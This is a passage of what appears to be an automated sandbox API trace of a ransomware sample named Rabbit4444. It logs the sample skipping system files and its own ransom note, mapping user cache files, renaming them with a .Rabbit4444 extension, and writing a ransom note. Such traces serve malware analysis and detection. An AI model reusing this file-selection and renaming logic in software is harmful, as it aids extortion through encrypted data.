nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", cAlternateFileName="6BADA8~2")) returned 1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="Rabbit4444.exe") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2=".") returned 1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="..") returned 1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="windows") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="bootmgr") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="pagefile.sys") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="boot") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="ids.txt") returned -1 [0054.308] lstrcmpiW (lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", lpString2="NTUSER.DAT") returned -1 [0054.308] lstrcpyW (in: lpString1=0x130ebc2, lpString2="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" | out: lpString1="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203") returned="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" [0054.308] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", dwFileAttributes=0x2020) returned 1 [0054.309] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203", dwFileAttributes=0x2004) returned 1 [0054.309] lstrlenW (lpString="6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203") returned 65 [0054.309] lstrlenW (lpString="Rabbit4444") returned 10 [0054.309] lstrcmpiW (lpString1="3475345203", lpString2="Rabbit4444") returned -1 [0054.309] lstrlenW (lpString=".dll") returned 4 [0054.309] lstrcmpiW (lpString1="5203", lpString2=".dll") returned 1 [0054.309] lstrlenW (lpString=".lnk") returned 4 [0054.309] lstrcmpiW (lpString1="5203", lpString2=".lnk") returned 1 [0054.309] lstrlenW (lpString=".ini") returned 4 [0054.309] lstrcmpiW (lpString1="5203", lpString2=".ini") returned 1 [0054.309] lstrlenW (lpString=".sys") returned 4 [0054.309] lstrcmpiW (lpString1="5203", lpString2=".sys") returned 1 [0054.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_d9817bd5013875ad517da73475345203"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.310] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.310] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14562048262) returned 1 [0054.310] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=438) returned 1 [0054.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0054.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0054.310] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c0, lpName=0x0) returned 0x298 [0054.313] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x70000 [0054.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0054.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0054.314] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0054.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0054.314] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14562494942) returned 1 [0054.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0054.314] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0054.314] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.314] CloseHandle (hObject=0x298) returned 1 [0054.314] CloseHandle (hObject=0x278) returned 1 [0054.315] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203.Rabbit4444") returned 145 [0054.315] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_d9817bd5013875ad517da73475345203"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\6bada8974a10c4bd62cc921d13e43b18_d9817bd5013875ad517da73475345203.rabbit4444"), dwFlags=0x1) returned 1 [0054.315] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdfedb1f6, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xea2c6105, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x14a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="Rabbit4444.exe") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2=".") returned 1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="..") returned 1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="windows") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="bootmgr") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="pagefile.sys") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="boot") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="ids.txt") returned -1 [0054.315] lstrcmpiW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="NTUSER.DAT") returned -1 [0054.315] lstrcpyW (in: lpString1=0x130ebc2, lpString2="77EC63BDA74BD0D0E0426DC8F8008506" | out: lpString1="77EC63BDA74BD0D0E0426DC8F8008506") returned="77EC63BDA74BD0D0E0426DC8F8008506" [0054.315] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2020) returned 1 [0054.316] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506", dwFileAttributes=0x2004) returned 1 [0054.316] lstrlenW (lpString="77EC63BDA74BD0D0E0426DC8F8008506") returned 32 [0054.316] lstrlenW (lpString="Rabbit4444") returned 10 [0054.316] lstrcmpiW (lpString1="C8F8008506", lpString2="Rabbit4444") returned -1 [0054.316] lstrlenW (lpString=".dll") returned 4 [0054.316] lstrcmpiW (lpString1="8506", lpString2=".dll") returned 1 [0054.316] lstrlenW (lpString=".lnk") returned 4 [0054.316] lstrcmpiW (lpString1="8506", lpString2=".lnk") returned 1 [0054.316] lstrlenW (lpString=".ini") returned 4 [0054.316] lstrcmpiW (lpString1="8506", lpString2=".ini") returned 1 [0054.316] lstrlenW (lpString=".sys") returned 4 [0054.316] lstrcmpiW (lpString1="8506", lpString2=".sys") returned 1 [0054.316] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.316] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.316] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14562703359) returned 1 [0054.316] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=330) returned 1 [0054.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0054.316] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0054.316] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x298 [0054.317] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x70000 [0054.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0054.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0054.318] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0054.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0054.318] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14562888157) returned 1 [0054.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0054.318] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0054.318] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.318] CloseHandle (hObject=0x298) returned 1 [0054.318] CloseHandle (hObject=0x278) returned 1 [0054.319] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444") returned 112 [0054.319] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\77ec63bda74bd0d0e0426dc8f8008506.rabbit4444"), dwFlags=0x1) returned 1 [0054.320] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdff01446, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdff01446, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd83c4863, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x14a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="Rabbit4444.exe") returned -1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2=".") returned 1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="..") returned 1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="windows") returned -1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="bootmgr") returned 1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="pagefile.sys") returned -1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="boot") returned 1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="ids.txt") returned -1 [0054.320] lstrcmpiW (lpString1="FB0D848F74F70BB2EAA93746D24D9749", lpString2="NTUSER.DAT") returned -1 [0054.320] lstrcpyW (in: lpString1=0x130ebc2, lpString2="FB0D848F74F70BB2EAA93746D24D9749" | out: lpString1="FB0D848F74F70BB2EAA93746D24D9749") returned="FB0D848F74F70BB2EAA93746D24D9749" [0054.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2020) returned 1 [0054.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749", dwFileAttributes=0x2004) returned 1 [0054.320] lstrlenW (lpString="FB0D848F74F70BB2EAA93746D24D9749") returned 32 [0054.320] lstrlenW (lpString="Rabbit4444") returned 10 [0054.320] lstrcmpiW (lpString1="46D24D9749", lpString2="Rabbit4444") returned -1 [0054.320] lstrlenW (lpString=".dll") returned 4 [0054.321] lstrcmpiW (lpString1="9749", lpString2=".dll") returned 1 [0054.321] lstrlenW (lpString=".lnk") returned 4 [0054.321] lstrcmpiW (lpString1="9749", lpString2=".lnk") returned 1 [0054.321] lstrlenW (lpString=".ini") returned 4 [0054.321] lstrcmpiW (lpString1="9749", lpString2=".ini") returned 1 [0054.321] lstrlenW (lpString=".sys") returned 4 [0054.321] lstrcmpiW (lpString1="9749", lpString2=".sys") returned 1 [0054.321] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.321] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.321] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14563168021) returned 1 [0054.321] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=330) returned 1 [0054.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0054.321] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0054.321] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x298 [0054.322] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x70000 [0054.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0054.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0054.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0054.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0054.323] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14563331953) returned 1 [0054.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0054.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0054.323] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.323] CloseHandle (hObject=0x298) returned 1 [0054.323] CloseHandle (hObject=0x278) returned 1 [0054.324] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444") returned 112 [0054.324] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\FB0D848F74F70BB2EAA93746D24D9749.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\fb0d848f74f70bb2eaa93746d24d9749.rabbit4444"), dwFlags=0x1) returned 1 [0054.324] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xdff01446, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdff01446, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd83c4863, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x14a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FB0D848F74F70BB2EAA93746D24D9749", cAlternateFileName="FB0D84~1")) returned 0 [0054.324] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0054.324] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.324] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.325] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.325] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.325] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.326] CloseHandle (hObject=0x278) returned 1 [0054.326] CloseHandle (hObject=0x27c) returned 1 [0054.326] GetCurrentThreadId () returned 0xd98 [0054.326] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0054.326] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0054.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0054.326] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0054.326] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0054.326] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\" [0054.326] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3" [0054.326] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.329] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.332] FlushFileBuffers (hFile=0x27c) returned 1 [0054.333] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.333] CloseHandle (hObject=0x27c) returned 1 [0054.334] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 67 [0054.334] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.334] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0xe9b5bd4f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0054.334] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.334] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.334] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.334] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.334] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbac9c0cb, 